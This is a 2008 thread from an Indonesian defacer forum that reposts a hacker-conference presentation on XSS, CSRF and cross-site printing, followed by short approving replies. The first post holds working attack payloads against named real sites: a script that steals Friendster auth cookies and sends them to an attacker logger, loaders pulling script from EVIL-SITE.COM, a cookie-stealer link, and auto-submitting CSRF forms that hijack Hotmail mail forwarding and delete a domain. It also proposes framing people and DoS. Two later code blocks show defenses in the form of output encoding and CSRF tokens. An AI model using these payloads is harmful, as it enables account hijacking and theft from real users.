Komunitas Defacer Indonesia

The X (Hacker's Night Day Presentation)

Cruz3N
Newbie

Posts: 23
Join date: 03.06.08

Subject: The X (Hacker's Night Day Presentation)   Thu Jul 03, 2008 4:53 am

Source: Hacker's Night Day presentation by Anselmus Ricky (Th0R)
Title: The X



~ Cross Site Scripting (XSS)
~ Cross Site Request Forgery (CSRF)
~ Cross Site Printing (XSP)
~ Malicious JavaScript

Payload of XSS, CSRF and/or XSP attacks. Typically written in JavaScript, and executed in a browser.

Cross Site Scripting (XSS)
Forcing malicious content to be served by a trusted website to an unsuspecting user.

Being hacked with a Cross Site Scripting (XSS) attack!
~ Website owner embedded his own website with malicious JavaScript.
~ Website defaced with embedded JavaScript malware.
~ JavaScript malware injected into a public area of a website (Persistent XSS).
~ Click on a specially-crafted link causing the website to echo JavaScript malware (Non-Persistent XSS).

Types of XSS

~ Persistent XSS
The persistent or Type 2 XSS vulnerability is also referred to as a stored or second-order vulnerability, and it allows the most powerful kinds of attacks. A type 2 XSS vulnerability exists when data provided to a web application by a user is first stored persistently on the server (in a database, filesystem, or other location), and later displayed to users in a web page without being encoded using HTML entities.

~ Non-persistent XSS
The non-persistent or Type 1 cross-site scripting hole is also referred to as a reflected vulnerability, and is by far the most common type. These holes show up when data provided by a web client is used immediately by server-side scripts to generate a page of results for that user.

Non-persistent XSS
Example:

http://protocollo.gov.it/01RiepIni.asp?NI="><script>alert("Th0R%20was%20Here!")</script>

http://www.friendster.com/gallery.php?_ ... own&kword=[PUT XSS CODE HERE]

http://www.friendster.com/gallery.php?_ ... Fscript%3E

http://www.friendster.com/gallery.php?_ ... /script%3E

File.js

var pUrl=window.location.href.search(/profiles\./),pV=pageViewerID,pO=pageOwnerID,pN=pageViewerFName;
var cLoger="YOUR_LOGER_FILE.PHP",ck=fgetCookie("friendster_auth");
fr=document.createElement('iframe');
fr.height='0';fr.width='0';fr.frameBorder='0';
fr.src=cLoger+'?c='+escape(ck)+'&s='+escape(pN)+'~'+pV+'~@'+pO;navigation.appendChild(fr);

Filejs2.txt
fr=document.createElement('iframe');fr.height='0';fr.width='0';fr.frameBorder='0';fr.src='http://www.friendster.com/gallery.php?_submitted=1&ktype=hometown&kword=%3C/script%3E%3Cscript%20src%3D%22http%3A//EVIL-SITE.COM/filejs.js%22%3E%3C/script%3E';flo1t.appendChild(fr);

Injected Code
<img xmlns:dict="dict" alt="star" src="http://images.friendster.com/images/rating_star.gif" onLoaD ="a=document.createElement('script');a.src='http://EVIL-SITE.COM/filejs2.txt';flo1t.appendChild(a)" style=height:0;width:0>

Example:
~ Bulletin Board Attack (where HTML postings are allowed).
~ <pre a='>' onmouseover='document.location="http://www.milw0rm.com/cookie_stealer.php?c="+document·cookie' b='<pre' >
~ Email Hacking (tested on Yahoo and Gmail quite a long time ago).
~ etc

Cross Site Request Forgery (CSRF)
Also known as XSRF or 1-click attack or sidejacking, forcing an unsuspecting user's browser to send requests they didn't intend.

The use of Cross Site Request Forgery (CSRF) to hack!
~ Can be used in order to hack/break into several free mail providers in this world, such as http://www.hotmail.com
~ If you want to send someone to jail just because they clicked on your built-up links, then you can do it with CSRF! I myself name it 1-Click to Jail!
~ CSRF attacks are also usable for boosting the power of several other kinds of attacks such as Denial of Service (DoS) and/or Distributed Denial of Service (DDoS).

CSRF on Hotmail Video
Can be downloaded here:
http://www.th0r.info/products/clip0001.rar

CSRF on Hotmail Hacking

~ *.html files attached within emails:

<html>
<body>
<bOdy onload="document.CSRF.submit()">
<form name="CSRF" method="POST" action="http://by138w.bay138.mail.live.com/mail/options.aspx?subsection=32&n=487173350&resend=0" style="display:none">
</body>
</html>

~ Actual link:
http://by111w.bay111.mail.live.com/mail ... ection=32&n=487173350&resend=0&gs=true&ctl02%24SaveButton=true%ctl02%24ForwardingToggle=2&ctl02%24AddressTextBox=binus_2_0_0_4@hotmail.com

Better Clue: “You need an iFrame”

Doing DoS by using CSRF
All the equipment you need:

~ Browser (can be IE/Firefox/Safari/etc).
~ A website that can help you with sitemap generation.
~ A little program to do the looping.
~ Your hands and eyes to watch over the victim's website.

Annoying CSRF
Look at this:

<form name="f" action="http://www.uni.cc/site/dcp_ddelete1.php" method="POST">
<input type="hidden" name="DN" value="testdoank.uni.cc">
<input type="submit" name="s" class="btn" value="Click here to see my HOT Pics">
</form>
<script language="javascript">
document.forms[0].submit()
</script>

Cross Site Printing (XSP)
Forcing malicious content to be served by a trusted website to several specific intranet networks and unsuspecting printers.

What can you do with Cross Site Printing?!

<FORM Action='http://YOURPRINTER:9100' ID='MsgForm' ENCTYPE='Multipart/Form-data' Method='POST'> <TEXTAREA NAME='MSG' ID='MSG' WRAP='NONE' ROWS='50' COLS='100'> Testing this printer out. </TEXTAREA><INPUT TYPE=SUBMIT Value=SUBMIT></FORM>

Most of today’s Cross Site scripting attacks are using this kind of trick:

http://bbs.cn.yahoo.com/searchApplyBoar ... 0Pg==.html

Translated into human tongue as - <script>alert("XSS-bypass-No-Script")</script>

Sorry that I can't translate this; besides, you'll surely understand at least a bit of it...
And really sorry if it was presumptuous of me to start posting right away...
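The post's definition of persistent XSS names the missing control (output not "encoded using HTML entities"). The following is an added example, not part of the original post or presentation: it compares a hypothetical naive tag filter with entity encoding on a constructed payload shaped like the bulletin-board example above. The function names and the simplified tag scan are assumptions made for illustration.

```javascript
// Constructed payload with the same shape as the bulletin-board example in
// the post; the handler body is a harmless alert().
const payload = "<pre a='>' onmouseover='alert(1)' b='<pre' >";

const hasEventHandler = (tag) => /\son\w+\s*=/i.test(tag);

// Hypothetical naive filter: treats '<' up to the next '>' as one tag and
// rejects input only if such a "tag" carries an on* attribute.
function naiveFilterAccepts(html) {
  return !(html.match(/<[^>]*>/g) || []).some(hasEventHandler);
}

// Simplified quote-aware scan, closer to an HTML tokenizer: a '>' inside a
// quoted attribute value does not end the tag.
function firstTagAsParsed(html) {
  const start = html.indexOf("<");
  if (start < 0) return null;
  let quote = null;
  for (let i = start + 1; i < html.length; i++) {
    const ch = html[i];
    if (quote) {
      if (ch === quote) quote = null;
    } else if (ch === '"' || ch === "'") {
      quote = ch;
    } else if (ch === ">") {
      return html.slice(start, i + 1);
    }
  }
  return null; // no complete tag
}

// Output encoding for HTML text and quoted attribute values.
const ENTITIES = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
const encodeHtml = (s) => String(s).replace(/[&<>"']/g, (c) => ENTITIES[c]);

function report(input) {
  const encoded = encodeHtml(input);
  return {
    naiveFilterAccepts: naiveFilterAccepts(input),
    parsedTagHasHandler: hasEventHandler(firstTagAsParsed(input) || ""),
    encoded,
    encodedHasTag: firstTagAsParsed(encoded) !== null,
  };
}

console.log(report(payload));
```

The filter accepts the input because it ends the first "tag" at the quoted `>`, while the quote-aware scan sees one tag that still carries the handler; after encoding, no tag remains to parse.
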
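The auto-submitting forms in the post work because the target accepts a state-changing POST on the strength of the session cookie alone. The following is an added example, not part of the original post or presentation: a server-side gate that checks the Origin header and a session-bound HMAC token. The origin, session id, field name `csrf_token` and request objects are constructed assumptions.

```javascript
const crypto = require("crypto");

// Assumptions for this added example: a per-process secret and the
// application's own origin. Both names are hypothetical.
const SECRET = crypto.randomBytes(32);
const TRUSTED_ORIGIN = "https://app.example";

// Token bound to the user's session: HMAC-SHA256(secret, sessionId).
function issueToken(sessionId) {
  return crypto.createHmac("sha256", SECRET).update(sessionId).digest("hex");
}

// Constant-time comparison; a missing or malformed token never matches.
function tokenMatches(sessionId, token) {
  const expected = Buffer.from(issueToken(sessionId), "hex");
  const given = Buffer.from(String(token || ""), "hex");
  return given.length === expected.length && crypto.timingSafeEqual(given, expected);
}

// Gate for any state-changing handler (delete, forward mail, ...).
function allowStateChange(req) {
  if (req.method !== "POST") return { ok: false, reason: "not a POST" };
  if (req.origin !== TRUSTED_ORIGIN) return { ok: false, reason: "foreign or missing Origin" };
  if (!tokenMatches(req.sessionId, req.body.csrf_token)) {
    return { ok: false, reason: "missing or invalid CSRF token" };
  }
  return { ok: true, reason: "accepted" };
}

// Constructed requests. The browser attaches the session cookie in all three.
const session = "sess-constructed-1234";
const forged = { method: "POST", origin: "https://other.example", sessionId: session,
                 body: { DN: "site.example", s: "Click here" } };
const noToken = { ...forged, origin: TRUSTED_ORIGIN };
const genuine = { method: "POST", origin: TRUSTED_ORIGIN, sessionId: session,
                  body: { DN: "site.example", csrf_token: issueToken(session) } };

for (const [name, req] of Object.entries({ forged, noToken, genuine })) {
  console.log(name, allowStateChange(req));
}
```
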
bL4Ck_3n91n3
MotherFucker!?

Posts: 568
Join date: 18.04.08

Subject: Re: The X (Hacker's Night Day Presentation)   Thu Jul 03, 2008 4:59 am

Wow, cool

Nice, try translating it with a calculator

_________________
What da fuck!!! are u looking for!?
SmarterDOS
Developt Kiddie

Posts: 467
Join date: 18.05.08

Subject: Re: The X (Hacker's Night Day Presentation)   Thu Jul 03, 2008 9:12 am

Whoa ....

Really cool, bro ...
ascii
Admin

Posts: 379
Join date: 18.04.08

Subject: Re: The X (Hacker's Night Day Presentation)   Sun Jul 06, 2008 12:33 pm

Thoroughly dissected...
cr4wl3r
I'am Not Hacker

Posts: 373
Join date: 18.04.08
Age: 30
Location: In Your Mind

Subject: Re: The X (Hacker's Night Day Presentation)   Mon Jul 07, 2008 8:29 am

thanks for share bro
eMoLution
Lamer

Posts: 89
Join date: 02.08.08
Age: 25
Location: --------

Subject: Re: The X (Hacker's Night Day Presentation)   Thu Aug 21, 2008 7:19 am

niCe Share.,.,,.,.,


i'm loVin it.,..,.,